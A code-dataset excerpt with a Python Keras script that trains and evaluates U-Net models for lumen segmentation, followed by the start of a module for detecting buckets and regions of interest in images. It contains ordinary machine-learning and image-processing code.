ReduceLROnPlateau, CSVLogger, TensorBoard\nfrom tqdm import tqdm\nimport tensorflow as tf\nimport keras.backend as K\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.models import Model\nimport copy\nimport os\nimport csv\nimport matplotlib.pyplot as plt\nfrom Unet_based import ResUnet\nfrom Unet_based import Transpose_ResUnet\nfrom Unet_based import Transpose_Unet\nfrom Unet_based import Unet\nfrom Unet_based import continuous_blocks_ResUnet\nfrom Unet_based import ensemble\nfrom Unet_based import ensemble_2\nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import accuracy_score\nimport datetime\nimport Unet_based as un\n\n\ndef load_data(path, image_modality):\n print(path)\n path_images = ''.join([path, 'image/*'])\n path_labels = ''.join([path, \"label/*\"])\n images = sorted(glob(path_images))\n masks = sorted(glob(path_labels))\n total_size_images = len(images)\n total_size_labels = len(masks)\n print('total size images:', total_size_images, path_images)\n print('total size labels:', total_size_labels, path_labels)\n return (images, masks)\n\n\ndef load_data_only_imgs(path):\n print(path)\n path_images = ''.join([path, \"/*\"])\n images = sorted(glob(path_images))\n total_size_images = len(images)\n print('total size images:', total_size_images, path_images)\n return (images, images)\n\n\ndef read_mask_test(path):\n x = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n x = cv2.resize(x, (256, 256))\n x = np.expand_dims(x, axis=-1)\n return x\n\n\ndef read_image(path):\n\n path = path.decode()\n x = cv2.imread(path, 1)\n x = cv2.resize(x, (256, 256))\n x = x/255.0\n return x\n\n\ndef read_image_and_npy(path):\n path = path.decode()\n x_vol = np.load(path, allow_pickle=True)\n x_vol = np.resize(x_vol, (3, 256, 256, 3))\n x_vol = x_vol / 255.0\n x_frame = x_vol[0]\n x_frame = cv2.resize(x_frame, (256, 256))\n x_frame = x_frame / 255.0\n\n return x_vol, x_frame\n\n\ndef read_image_npy(path):\n path = path.decode()\n x = np.load(path, allow_pickle=True)\n x = np.resize(x, (3, 256, 256, 3))\n x = x / 255.0\n\n return x\n\n\ndef read_mask(path):\n path = path.decode()\n x = cv2.imread(path)\n x = cv2.cvtColor(x, cv2.COLOR_BGR2GRAY)\n x = cv2.resize(x, (256, 256))\n x = x/255.0\n x = np.expand_dims(x, axis=-1)\n return x\n\n\ndef tf_parse(x, y):\n def _parse(x, y):\n x = read_image(x)\n y = read_mask(y)\n return x, y\n\n x, y = tf.numpy_function(_parse, [x, y], [tf.float64, tf.float64])\n x.set_shape([256, 256, 3])\n y.set_shape([256, 256, 1])\n return x, y\n\n\ndef tf_parse_v2(x, y):\n def _parse(x, y):\n x = read_image_npy(x)\n y = read_mask(y)\n return x, y\n\n x, y = tf.numpy_function(_parse, [x, y], [tf.float64, tf.float64])\n x.set_shape([3, 256, 256, 3])\n y.set_shape([256, 256, 1])\n return x, y\n\n\ndef tf_parse_v3(x, y):\n def _parse(x, y):\n x_vol, x_frame = read_image_and_npy(x)\n y = read_mask(y)\n\n return x_vol, x_frame, y\n\n x_vol, x_frame, y = tf.numpy_function(_parse, [x, y], [tf.float64, tf.float64, tf.float64])\n x_vol.set_shape([3, 256, 256, 3])\n x_frame.set_shape([256, 256, 3])\n y.set_shape([256, 256, 1])\n return (x_vol, x_frame), y\n\n\ndef tf_dataset(x, y, batch=8, img_modality='rgb'):\n dataset = tf.data.Dataset.from_tensor_slices((x, y))\n\n if img_modality == 'npy':\n dataset = dataset.map(tf_parse_v2)\n elif img_modality == 'ensemble':\n dataset = dataset.map(tf_parse_v3)\n else:\n dataset = dataset.map(tf_parse)\n\n dataset = dataset.batch(batch)\n dataset = dataset.repeat()\n return dataset\n\n\ndef iou(y_true, y_pred, smooth=1e-15):\n def f(y_true, y_pred):\n intersection = (y_true * y_pred).sum()\n union = y_true.sum() + y_pred.sum() - intersection\n x = (intersection + smooth) / (union + smooth)\n x = x.astype(np.float32)\n return x\n\n return tf.numpy_function(f, [y_true, y_pred], tf.float32)\n\n\ndef dice_coef(y_true, y_pred, smooth=1):\n intersection = K.sum(y_true * y_pred, axis=[1, 2, 3])\n union = K.sum(y_true, axis=[1, 2, 3]) + K.sum(y_pred, axis=[1, 2, 3])\n return K.mean((2. * intersection + smooth) / (union + smooth), axis=0)\n\n\ndef dice_coef_loss(y_true, y_pred):\n return 1 - dice_coef(y_true, y_pred)\n\n\ndef build_model(model_name):\n\n size = 256\n num_filters = [16, 32, 48, 64]\n # num_filters = [64, 48, 32, 16]\n # num_filters = [64, 128, 256, 512]\n inputs = Input((size, size, 3))\n\n if model_name == 'ResUnet':\n model = ResUnet.build_model()\n\n elif model_name == 'Transpose_Unet':\n model = Transpose_Unet.build_model()\n\n elif model_name == 'Transpose_ResUnet':\n model = Transpose_ResUnet.build_model()\n\n elif model_name == 'Unet':\n model = Unet.build_model()\n\n elif model_name == 'continuous_blocks_ResUnet':\n model = continuous_blocks_ResUnet.build()\n\n elif model_name == 'simple_ensemble':\n model = ensemble.build_model()\n\n elif model_name == 'ensemble':\n model = ensemble_2.build_model()\n\n return model\n\n\ndef mask_parse(mask):\n mask = np.squeeze(mask)\n mask = [mask, mask, mask]\n mask = np.transpose(mask, (1, 2, 0))\n return mask\n\n\ndef read_image_test(path, img_modality='rgb'):\n if img_modality == 'npy':\n x = np.load(path, allow_pickle=True)\n x = np.resize(x, (3, 256, 256, 3))\n x = x / 255.0\n\n elif img_modality == 'ensemble':\n x_vol = np.load(path, allow_pickle=True)\n x_vol = np.resize(x_vol, (3, 256, 256, 3))\n x_vol = x_vol / 255.0\n x_frame = x_vol[0]\n x_frame = cv2.resize(x_frame, (256, 256))\n x_frame = x_frame / 255.0\n x = x_vol, x_frame\n\n else:\n x = cv2.imread(path, cv2.IMREAD_COLOR)\n x = cv2.resize(x, (256, 256))\n x = x / 255.0\n\n return x\n\n\ndef read_mask_test(path):\n x = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n x = cv2.resize(x, (256, 256))\n x = np.expand_dims(x, axis=-1)\n return x\n\n\ndef get_mcc(groundtruth_list, predicted_list):\n \"\"\"Return mcc covering edge cases\"\"\"\n\n tn, fp, fn, tp = get_confusion_matrix_elements(groundtruth_list, predicted_list)\n\n if _all_class_0_predicted_as_class_0(groundtruth_list, predicted_list) is True:\n mcc = 1\n elif _all_class_1_predicted_as_class_1(groundtruth_list, predicted_list) is True:\n mcc = 1\n elif _all_class_1_predicted_as_class_0(groundtruth_list, predicted_list) is True:\n mcc = -1\n elif _all_class_0_predicted_as_class_1(groundtruth_list, predicted_list) is True:\n mcc = -1\n\n elif _mcc_denominator_zero(tn, fp, fn, tp) is True:\n mcc = -1\n\n # Finally calculate MCC\n else:\n mcc = ((tp * tn) - (fp * fn)) / (\n np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)))\n\n return mcc\n\n\ndef get_confusion_matrix_intersection_mats(groundtruth, predicted):\n \"\"\" Returns dict of 4 boolean numpy arrays with True at TP, FP, FN, TN\n \"\"\"\n\n confusion_matrix_arrs = {}\n\n groundtruth_inverse = np.logical_not(groundtruth)\n predicted_inverse = np.logical_not(predicted)\n\n confusion_matrix_arrs['tp'] = np.logical_and(groundtruth, predicted)\n confusion_matrix_arrs['tn'] = np.logical_and(groundtruth, predicted_inverse)\n confusion_matrix_arrs['fp'] = np.logical_and(groundtruth_inverse, predicted)\n confusion_matrix_arrs['fn'] = np.logical_and(groundtruth, predicted_inverse)\n\n return confusion_matrix_arrs\n\n\ndef get_confusion_matrix_overlaid_mask(image, groundtruth, predicted, alpha, colors):\n \"\"\"\n Returns overlay the 'image' with a color mask where TP, FP, FN, TN are\n each a color given by the 'colors' dictionary\n \"\"\"\n image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n masks = get_confusion_matrix_intersection_mats(groundtruth, predicted)\n color_mask = np.zeros_like(image)\n for label, mask in masks.items():\n color = colors[label]\n mask_rgb = np.zeros_like(image)\n mask_rgb[mask != 0] = color\n color_mask += mask_rgb\n return cv2.addWeighted(image, alpha, color_mask, 1 - alpha, 0)\n\n\ndef calculate_rates(image_1, image_2):\n image_1 = np.asarray(image_1).astype(np.bool)\n image_2 = np.asarray(image_2).astype(np.bool)\n image_1 = image_1.flatten()\n image_2 = image_2.flatten()\n\n if image_1.shape != image_2.shape:\n raise ValueError(\"Shape mismatch: im1 and im2 must have the same shape.\")\n\n accuracy_value = accuracy_score(image_1, image_2)\n\n if (np.unique(image_1) == [False]).all() and (np.unique(image_1) == [False]).all():\n recall_value = 1.\n precision_value = 1.\n\n else:\n recall_value = recall_score(image_1, image_2)\n precision_value = average_precision_score(image_1, image_2)\n\n return precision_value, recall_value, accuracy_value\n\n\ndef dice(im1, im2, smooth=0.001):\n im1 = np.asarray(im1).astype(np.bool)\n im2 = np.asarray(im2).astype(np.bool)\n\n if im1.shape != im2.shape:\n raise ValueError(\"Shape mismatch: im1 and im2 must have the same shape.\")\n\n # Compute Dice coefficient\n intersection = np.logical_and(im1, im2)\n if (np.unique(im1) == [False]).all() and (np.unique(im2) == [False]).all():\n dsc = 1.\n else:\n dsc = 2. * (intersection.sum() + smooth) / (im1.sum() + im2.sum() + smooth)\n\n return dsc\n # return 2. * (intersection.sum() + smooth) / (im1.sum() + im2.sum() + smooth)\n\n\ndef read_img(dir_image):\n original_img = cv2.imread(dir_image)\n img = cv2.resize(original_img, (256, 256))\n img = img / 255\n return img\n\n\ndef read_results_csv(file_path, row_id=0):\n dice_values = []\n with open(file_path, 'r') as file:\n reader = csv.reader(file)\n for row in reader:\n dice_values.append(float(row[row_id]))\n\n return dice_values\n\n\ndef evaluate_and_predict(model, directory_to_evaluate,\n image_modality, results_directory, output_name, new_results_id):\n\n output_directory = 'predictions/' + output_name + '/'\n batch_size = 8\n print(image_modality)\n (test_x, test_y) = load_data(directory_to_evaluate, image_modality)\n test_dataset = tf_dataset(test_x, test_y, batch=batch_size,\n img_modality=image_modality)\n test_steps = (len(test_x)//batch_size)\n\n if len(test_x) % batch_size != 0:\n test_steps += 1\n\n # evaluate the model in the test dataset\n model.evaluate(test_dataset, steps=test_steps)\n times = []\n for i, (x, y) in tqdm(enumerate(zip(test_x, test_y)), total=len(test_x)):\n directory_image = x\n init_time = time.time()\n x = read_image_test(x, image_modality)\n if image_modality == 'ensemble':\n x_vol = np.expand_dims(x[0], axis=0)\n x_frame = np.expand_dims(x[1], axis=0)\n print(np.shape(x_vol))\n print(np.shape(x_frame))\n x = x_vol, x_frame\n else:\n x = np.expand_dims(x, axis=0)\n\n y_pred = model.predict(x)[0] > 0.5\n delta = time.time() - init_time\n times.append(delta)\n name_original_file = directory_image.replace(''.join([directory_to_evaluate, 'image/']), '')\n\n if image_modality == 'npy' or image_modality == 'ensemble':\n name_original_file = name_original_file.replace('.npy', '.png')\n results_name = ''.join([results_directory, output_directory, name_original_file])\n cv2.imwrite(results_name, y_pred * 255.0)\n\n # save the results of the test dataset in a CSV file\n ground_truth_imgs_dir = directory_to_evaluate + 'image/'\n result_mask_dir = results_directory + output_directory\n\n ground_truth_image_list = [file for file in os.listdir(ground_truth_imgs_dir) if\n os.path.isfile(os.path.join(ground_truth_imgs_dir, file))]\n results_image_list = [file for file in os.listdir(result_mask_dir) if os.path.isfile(os.path.join(result_mask_dir, file))]\n results_dice = []\n results_sensitivity = []\n results_specificity = []\n output_directory = 'predictions/' + output_name + '/'\n batch_size = 8\n (test_x, test_y) = load_data(directory_to_evaluate, image_modality)\n test_dataset = tf_dataset(test_x, test_y, batch=batch_size,\n img_modality=image_modality)\n test_steps = (len(test_x) // batch_size)\n\n # save the results of the test dataset in a CSV file\n ground_truth_imgs_dir = directory_to_evaluate + 'image/'\n ground_truth_labels_dir = directory_to_evaluate + 'label/'\n result_mask_dir = results_directory + output_directory\n\n ground_truth_image_list = [file for file in os.listdir(ground_truth_imgs_dir) if\n os.path.isfile(os.path.join(ground_truth_imgs_dir, file))]\n results_image_list = [file for file in os.listdir(result_mask_dir) if os.path.isfile(\n os.path.join(result_mask_dir, file))]\n results_dice = []\n results_sensitivity = []\n results_specificity = []\n results_accuracy = []\n\n for image in ground_truth_image_list[:]:\n result_image = [name for name in results_image_list if image[:-4] == name[:-4]][0]\n if result_image is not None:\n image_name = image[:-4]\n original_mask = read_img(''.join([ground_truth_labels_dir, image_name, '.png']))\n predicted_mask = read_img(''.join([result_mask_dir, result_image]))\n dice_val = dice(original_mask, predicted_mask)\n results_dice.append(dice_val)\n sensitivity, specificity, accuracy = calculate_rates(original_mask, predicted_mask)\n results_sensitivity.append(sensitivity)\n results_specificity.append(specificity)\n results_accuracy.append(accuracy)\n\n else:\n print(image, 'not found in results list')\n\n name_test_csv_file = ''.join([results_directory, 'results_evaluation_',\n output_name,\n '_',\n new_results_id,\n '_.csv'])\n\n with open(name_test_csv_file, mode='w') as results_file:\n results_file_writer = csv.writer(results_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n for i, file in enumerate(ground_truth_image_list):\n results_file_writer.writerow(\n [str(i), file, results_dice[i],\n results_sensitivity[i],\n results_specificity[i],\n results_accuracy[i]])\n\n if len(test_x) % batch_size != 0:\n test_steps += 1\n # evaluate the model in the test dataset\n model.evaluate(test_dataset, steps=test_steps)\n print('Average inference times and std:')\n print(np.average(times), np.std(times))\n return name_test_csv_file\n\n\ndef paint_imgs(img, mask):\n\n if np.shape(img) != np.shape(mask):\n img = cv2.resize(img, (np.shape(mask)[0], np.shape(mask)[1]))\n\n for i in range(np.shape(mask)[0]):\n for j in range(np.shape(mask)[1]):\n if mask[i, j, 0] == True:\n img[i, j, 1] = 100\n\n return img\n\n\ndef clean_mask(mask):\n\n mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)\n u8 = mask.astype(np.uint8)\n # remove the small areas appearing in the image if there is a considerable big one\n areas = []\n remove_small_areas = False\n contours, hierarchy = cv2.findContours(u8,\n cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n for contour in contours:\n areas.append(cv2.contourArea(contour))\n\n if len(contours) > 1:\n # sort the areas from bigger to smaller\n sorted_areas = sorted(areas, reverse=True)\n index_remove = np.ones(len(areas))\n for i in range(len(sorted_areas)-1):\n # if an area is 1/4 smaller than the bigger area, mark to remove\n if sorted_areas[i+1] < 0.15 * sorted_areas[0]:\n index_remove[areas.index(sorted_areas[i+1])] = 0\n remove_small_areas = True\n\n if remove_small_areas is True:\n #new_mask = np.zeros((w, d))\n new_mask = copy.copy(mask)\n for index, remove in enumerate(index_remove):\n if remove == 0:\n # replace the small areas with 0\n cv2.drawContours(new_mask, contours, index, (0, 0, 0), -1) # as opencv stores in BGR format\n else:\n new_mask = mask\n\n return new_mask\n\n\ndef save_history(name_performance_metrics_file, model_history):\n\n with open(name_performance_metrics_file, mode='w') as results_file:\n results_file_writer = csv.writer(results_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n list_keys = [str(item) for item in model_history.history.keys()]\n list_keys.insert(0, 'epoch')\n results_file_writer.writerow(list_keys)\n for i, element in enumerate(model_history.history['loss']):\n results_file_writer.writerow([str(i), element,\n model_history.history[list_keys[2]][i],\n model_history.history[list_keys[3]][i],\n model_history.history[list_keys[4]][i],\n model_history.history[list_keys[5]][i],\n model_history.history[list_keys[6]][i],\n model_history.history[list_keys[7]][i],\n model_history.history[list_keys[8]][i],\n model_history.history[list_keys[9]][i],\n model_history.history[list_keys[10]][i],\n model_history.history[list_keys[11]][i],\n model_history.history[list_keys[12]][i],\n model_history.history[list_keys[13]][i]])\n\n\ndef save_plots(model_history, results_directory, new_results_id):\n\n # summarize history for DSC\n plt.figure()\n plt.plot(model_history.history['dice_coef'], '-o')\n plt.plot(model_history.history['val_dice_coef'], '-o')\n plt.title('model DSC history')\n plt.ylabel('DSC')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.savefig(''.join([results_directory, 'DSC_history_', new_results_id, '_.svg']))\n plt.close()\n\n # summarize history for accuracy\n plt.figure()\n plt.plot(model_history.history['acc'])\n plt.plot(model_history.history['val_acc'])\n plt.title('model accuracy history')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.savefig(''.join([results_directory, 'Accuracy_history_', new_results_id, '_.svg']))\n plt.close()\n\n # summarize history for loss\n plt.figure()\n plt.plot(model_history.history['loss'], '-o')\n plt.plot(model_history.history['val_loss'], '-o')\n plt.title('model loss history')\n plt.ylabel('DSC loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'valtest'], loc='upper left')\n plt.savefig(''.join([results_directory, 'DSC_loss_history_', new_results_id, '_.svg']))\n plt.close()\n\n print('Plots of the history saved at: results_directory')\n\n\ndef main(project_folder, name_model, batch, lr):\n epochs = 950\n # optimizer:\n opt = tf.keras.optimizers.Adam(lr)\n\n # image modality of the data\n image_modality = 'rgb'\n augmented = True\n if augmented is True:\n amount_data = '/augmented_data/'\n else:\n amount_data = '/original_data/'\n\n # Define training and validation data\n train_data_used = ''.join([project_folder, 'train', amount_data])\n val_data_used = ''.join([project_folder, 'val', amount_data])\n\n if name_model == 'continuous_blocks_ResUnet':\n image_modality = 'npy'\n amount_data = '/original_data/'\n train_data_used = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n 'train', amount_data])\n val_data_used = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n 'val', amount_data])\n elif name_model == 'simple_ensemble' or name_model == 'ensemble':\n image_modality = 'ensemble'\n amount_data = '/original_data/'\n train_data_used = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n 'train', amount_data])\n val_data_used = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n 'val', amount_data])\n\n\n\n (train_x, train_y) = load_data(train_data_used, image_modality)\n print('Data training: ', train_data_used)\n\n (valid_x, valid_y) = load_data(val_data_used, image_modality)\n print('Data validation: ', val_data_used)\n\n train_dataset = tf_dataset(train_x, train_y, batch=batch,\n img_modality=image_modality)\n valid_dataset = tf_dataset(valid_x, valid_y, batch=batch,\n img_modality=image_modality)\n\n # metrics list:\n metrics = [\"acc\", tf.keras.metrics.Recall(),\n tf.keras.metrics.Precision(), dice_coef, iou]\n\n model = build_model(name_model)\n model.summary()\n model.compile(optimizer=opt, loss=dice_coef_loss, metrics=metrics)\n training_starting_time = datetime.datetime.now()\n\n # determine if also perform analysis of the training and validation dataset\n analyze_validation_set = False\n evaluate_train_dir = False\n # ID name for the folder and results\n\n new_results_id = ''.join([name_model,\n '_lr_',\n str(lr),\n '_bs_',\n str(batch),\n '_', image_modality, '_',\n training_starting_time.strftime(\"%d_%m_%Y_%H_%M\"),\n ])\n results_directory = ''.join([project_folder, 'results/', name_model,\n '/', new_results_id, '/'])\n # if results directory doesn't exists create it\n if not os.path.isdir(results_directory):\n os.mkdir(results_directory)\n\n callbacks = [\n ModelCheckpoint(results_directory + new_results_id + \"_model.h5\"),\n ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10),\n CSVLogger(results_directory + new_results_id + \"_data.csv\"),\n TensorBoard(),\n EarlyStopping(monitor='val_loss', patience=15, restore_best_weights=True)]\n\n train_steps = len(train_x) // batch\n valid_steps = len(valid_x) // batch\n\n if len(train_x) % batch != 0:\n train_steps += 1\n if len(valid_x) % batch != 0:\n valid_steps += 1\n\n start_time = datetime.datetime.now()\n\n # Train the network\n model_history = model.fit(train_dataset,\n validation_data=valid_dataset,\n epochs=epochs,\n steps_per_epoch=train_steps,\n validation_steps=valid_steps,\n callbacks=callbacks)\n # save the model\n model.save(results_directory + new_results_id + '_model')\n print('Total Training TIME:', (datetime.datetime.now() - start_time))\n print('METRICS Considered:')\n print(model_history.history.keys())\n\n name_performance_metrics_file = ''.join([results_directory,\n 'performance_metrics_',\n training_starting_time.strftime(\"%d_%m_%Y_%H_%M\"),\n '_.csv'])\n\n save_history(name_performance_metrics_file, model_history)\n save_plots(model_history, results_directory, new_results_id)\n # make directory for the predictions\n os.mkdir(results_directory + 'predictions/')\n # Evaluate and predict in the test dataset(s)\n list_of_test_sets = sorted(os.listdir(project_folder + 'test/'))\n\n for folder in list_of_test_sets:\n names_csv_files = []\n os.mkdir(''.join([results_directory, 'predictions/', folder, '/']))\n if image_modality == 'npy' or image_modality == 'ensemble':\n evaluation_directory = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n 'test/', folder, '/'])\n else:\n evaluation_directory = ''.join([project_folder, 'test/', folder, '/'])\n name_test_csv_file = evaluate_and_predict(model, evaluation_directory,\n image_modality,\n results_directory, folder, new_results_id)\n names_csv_files.append(name_test_csv_file)\n\n if analyze_validation_set is True:\n os.mkdir(results_directory + 'predictions/val/')\n if image_modality == 'npy' or image_modality == 'ensemble':\n evaluation_directory = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n 'val/original_data/'])\n else:\n evaluation_directory_val = project_folder + \"val/original_data/\"\n name_test_csv_file = evaluate_and_predict(model, evaluation_directory_val,\n image_modality, results_directory,\n 'val', new_results_id)\n\n if evaluate_train_dir is True:\n os.mkdir(results_directory + 'predictions/train/')\n if image_modality == 'npy' or image_modality == 'ensemble':\n evaluation_directory = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n 'train/original_data/'])\n else:\n evaluation_directory_val = project_folder + \"train/original_data/\"\n name_test_csv_file = evaluate_and_predict(model, evaluation_directory_val,\n image_modality, results_directory,\n 'train', new_results_id)\n\n\nif __name__ == \"__main__\":\n\n project_folder = '/home/nearlab/Jorge/current_work/lumen_segmentation/data/phantom_lumen/'\n name_models = ['ensemble']\n # Hyper-parameters:\n batches = [4]\n learing_rates = [1e-3, 1e-4, 1e-5]\n for name_model in name_models:\n for batch in batches:\n for lr in learing_rates:\n main(project_folder, name_model, batch, lr)\n\n\n\n","sub_path":"models/call_models.py","file_name":"call_models.py","file_ext":"py","file_size_in_byte":26764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"551480185","text":"import logging, cv2, json\nimport numpy as np\nfrom detectors.BoxDetector import BoxDetector\nfrom detectors.RoiDelineator import RoiDelineator\nimport utils.FMDLAlgoUtils as utils\nimport utils.visualizationUtils as visUtils\nfrom utils.config import Config\n\n\nINITIAL_NEGATIVE_NUMBER = -1\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.DEBUG)\n\n\n\nclass FMDLData:\n expected_configs = [\n # (config_name, lower bound, upper bound)\n ('measuredBucketWidthCM', 10, 100000, 'float'),\n ('boxDetectorScoreThresholdBucket', 0, 1, 'float'),\n ('boxDetectorScoreThresholdMatInside', 0, 1, 'float'),\n ('boxDetectorScoreThresholdCase', 0, 1, 'float'),\n ('roiDelineatorScoreThreshold', 0, 1, 'float'),\n ('minContourArea', 10, 100000, 'integer'),\n ('closingKernelSize', 1, 20, 'integer'),\n ('closingIterations', 0, 20, 'integer'),\n ('erosionKernelSize', 1, 20, 'integer'),\n ('erosionIterations', 0, 20, 'integer'),\n ('roiBoundaryPointsReductionFactor', 0.001, 0.1, 'float'),\n ('minObjectsRequired',[ [[]], [['bucket']], [['matInside']], [['matInside', 'bucket']],\\\n [['bucket', 'matInside']] ]),\n ('minBoundingBoxAspectRatio', 0.1, 10, 'float'),\n ('maxBoundingBoxAspectRatio', 0.1, 10, 'float'),\n ('intersectingRoiMaxIterations', 0, 100, 'integer'),\n ('intersectingRoiStepSize', 0.00001, 0.1, 'float'),\n ('effectiveWidthYcoordMultiplier', 0, 1, 'float'),\n ('maxDiffBetweenAbsBucketEdgeSlopes', 0, 100, 'float'),\n ]\n\n def __init__(self, debugMode=False):\n self.debugMode = debugMode\n self.initAllData()\n\n\n\n def initAllData(self):\n self.initAlgorithmInputsData()\n self.initAlgorithmOutputData()\n self.initAlgorithmIntermidiateData()\n\n\n\n def initAlgorithmInputsData(self):\n self.config = []\n self.input_image_np = []\n self.is_valid_image = False\n \n\n\n def initAlgorithmOutputData(self):\n global INITIAL_NEGATIVE_NUMBER\n\n self.imageWidthPx = INITIAL_NEGATIVE_NUMBER\n self.imageHeightPx = INITIAL_NEGATIVE_NUMBER\n self.pixel2CM_conversion_factor = INITIAL_NEGATIVE_NUMBER\n self.bucketWidthPX = INITIAL_NEGATIVE_NUMBER\n self.debug_info = []\n\n self.valid = False\n self.bucketValid = False\n self.matInsideValid = False\n self.effectiveWidthValid = False\n\n self.approximated_roi_boundary_2D = np.empty([], dtype=int)\n self.bucketBox = np.empty([], dtype=int)\n self.matInsideBox = np.empty([], dtype=int)\n self.bucketLeftLine = np.empty([], dtype=int)\n self.bucketRightLine = np.empty([], dtype=int)\n self.bucketMidLine = np.empty([], dtype=int)\n self.bucketWidthPointsXCord = np.empty([], dtype=int)\n\n\n\n def clearOutputData(self):\n global INITIAL_NEGATIVE_NUMBER\n\n self.imageWidthPx = INITIAL_NEGATIVE_NUMBER\n self.imageHeightPx = INITIAL_NEGATIVE_NUMBER\n self.pixel2CM_conversion_factor = INITIAL_NEGATIVE_NUMBER\n self.bucketWidthPX = INITIAL_NEGATIVE_NUMBER\n self.debug_info = []\n\n self.valid = False\n self.bucketValid = False\n self.matInsideValid = False\n self.effectiveWidthValid = False\n\n self.approximated_roi_boundary_2D = []\n self.bucketBox = []\n self.matInsideBox = []\n self.bucketLeftLine = []\n self.bucketRightLine = []\n self.bucketMidLine = []\n self.bucketWidthPointsXCord = []\n\n\n def initAlgorithmIntermidiateData(self):\n global INITIAL_NEGATIVE_NUMBER\n\n self.bucketBoundary = ()\n self.bucketScore = INITIAL_NEGATIVE_NUMBER\n self.matInsideBoundary = ()\n self.matInsideScore = INITIAL_NEGATIVE_NUMBER\n self.bestBoundary = ()\n\n self.caseScore = INITIAL_NEGATIVE_NUMBER\n self.caseBoundary = ()\n self.bucketLeftEdge = ()\n self.bucketRightEdge = ()\n self.bucketMidEdge = ()\n \n self.input_image_np_cropped = []\n self.roi_roidDelineatorSize = []\n self.roi_actualSize = []\n self.postProcessed_roi_actualSize = []\n self.roi_boundary_contour = np.empty([], dtype=int)\n self.approximated_roi_boundary = []\n \n \n\n def load_image(self, input_image):\n self.is_valid_image, self.input_image_np, self.imageWidthPx, self.imageHeightPx =\\\n utils.loadBytearrayImageIntoNp(input_image)\n\n\n\n def as_dict(self, debug = False):\n data_dict = {\n 'valid': self.valid,\n 'pixel2CM_conversion_factor': self.pixel2CM_conversion_factor,\n 'detected_bucketWidth_inPixels': self.bucketWidthPX,\n 'imageWidthPx': self.imageWidthPx,\n 'imageHeightPx': self.imageHeightPx,\n 'bucket_valid': self.bucketValid,\n 'matInside_valid': self.matInsideValid,\n 'effective_width_calculations_valid': self.effectiveWidthValid,\n 'approximated_roi_boundary': utils.getNumpyAsList(self.approximated_roi_boundary_2D, 'approximated_roi_boundary_2D'),\n 'approximated_bucket_box': utils.getNumpyAsList(self.bucketBox, 'bucketBox'),\n 'approximated_matInside_box': utils.getNumpyAsList(self.matInsideBox, 'matInsideBox'),\n 'approximated_bucket_left_line': utils.getNumpyAsList(self.bucketLeftLine, 'bucketLeftLine'),\n 'approximated_bucket_right_line': utils.getNumpyAsList(self.bucketRightLine, 'bucketRightLine'),\n 'approximated_bucket_mid_line': utils.getNumpyAsList(self.bucketMidLine, 'bucketMidLine'),\n 'bucketWidthPoints': utils.getNumpyAsList(self.bucketWidthPointsXCord, 'bucketWidthPointsXCord'),\n }\n\n if (debug):\n data_dict['debug'] = self.debug_info\n\n return data_dict\n\n\n\n\nclass FMDLAlgo:\n\n def __init__(self, boxDetectorNetworkPath, roiDelineatorNetworkPath, debugMode=False):\n self.logger = logging.getLogger(__name__)\n self.data = FMDLData(debugMode)\n\n if self.data.debugMode:\n self.logger.setLevel(logging.DEBUG)\n\n try:\n self.boxDetector = BoxDetector(boxDetectorNetworkPath)\n except utils.NetworkLoadException:\n self.logger.exception(\"Could not load the specified boxDetector network,\"\\\n \" you provided:\\n%s\\n\\n\", boxDetectorNetworkPath)\n raise utils.NetworkLoadException(boxDetectorNetworkPath)\n\n try:\n self.roiDelineator = RoiDelineator(roiDelineatorNetworkPath)\n except utils.NetworkLoadException:\n self.logger.exception(\"Could not load the specified roiDelineator network,\"\\\n \" you provided:\\n%s\\n\\n\", roiDelineatorNetworkPath)\n raise utils.NetworkLoadException(roiDelineatorNetworkPath)\n\n\n def _load_configs(self, input_config):\n self.data.config = Config(input_config, self.data.expected_configs)\n if not self.data.config.is_valid():\n self.logger.error(\n 'Missing required config items, you are missing: %s \\nYou provided:'\\\n '\\n%s\\n***Algo will early return***\\n\\n',\n self.data.config.missing_configs, input_config)\n return False\n\n self.logger.info(\"Equipment config items were successfully read.\\n\")\n self.logger.debug(\"The following equipment config items were provided and successfully\"\\\n \" read:\\n\\n%s\\n\\n\", input_config)\n return True\n\n\n def _load_image(self, input_image):\n self.data.load_image(input_image)\n if not self.data.is_valid_image:\n self.logger.error(\"Could not convert the provided input image from bytearray to\"\\\n \" numpy array.\\n***Algo will early return***\\n\\n\")\n return False\n\n if self.data.debugMode:\n self.data.debug_info.append({'description': 'Input image after conversion from\\\n bytearray to numpy','image': visUtils.encodeImageAsBase64(self.data.input_image_np)})\n return True\n\n\n def _detect_boundaries(self):\n validResult = self.boxDetector.inferOnSingleImage(self.data)\n\n self.logger.debug(\"Result of boxDetector.inferOnSingleImage was: %s\\n Highest scoring\"\\\n \" bucket bounding box was\\n %s \\nwith score of: %s\\n Highest scoring matInside bounding\"\\\n \" box was\\n%s\\nwith score of: %s\\n Highest scoring case bounding box was\\n%s\\nwith\"\\\n \" score of: %s\\n\\n\",validResult, self.data.bucketBoundary,self.data.bucketScore,\\\n self.data.matInsideBoundary, self.data.matInsideScore, 